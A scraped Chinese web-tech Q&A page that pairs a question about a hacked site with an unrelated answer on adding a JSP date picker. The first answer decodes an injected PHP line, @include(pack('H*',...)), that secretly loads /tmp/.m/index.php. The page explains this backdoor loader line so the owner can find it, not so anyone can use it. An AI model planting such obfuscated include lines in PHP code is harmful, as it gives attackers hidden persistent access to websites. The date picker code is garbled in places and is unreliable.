半点优化网 http://www.bdxc.net/
当前位置首页 > 网站技术问题> 正文

网站被侵入,.php代码中被植入@include(PACK('H*','2f746d702f2e6d2f696e6465782e706870'));。

2022-05-24 13:59:21 暂无评论 157 网站技术问题 日期   页面   选择

PACK(H*,。。。),是将16进制字符串转码
@INCLUDE_ONCE是包含文件,并忽略错误
实际就是include_once('/tmp/.m/index.php');

你查查这个文档是不是植入了这个文件

在jsp页面,日期选择框

做这个用控件吧,好做
1、下载My97DatePicker4.8Beta3


2、页面中引入
<script language=javascript type=text/javascript src=datepicker/WdatePicker.js></script>

3、Form中HTML代码
<input name=createdatetimeStart style=width: 120px; onFocus=WdatePicker({readOnly:true,dateFmt:'yyyy-MM-dd HH:mm:ss'}) /> 至
<input name=createdatetimeEnd style=width:120px; onFocus=WdatePicker({readOnly:true,dateFmt:'yyyy-MM-dd HH:mm:ss'}) />

4、后台取值就和普通文件框一样
String createdatetimeStart = request
.getParameter(createdatetimeStart) == null ?
: request.getParameter(createdatetimeStart).trim();

认认真真为你答题,希望对你有帮助。

猜你喜欢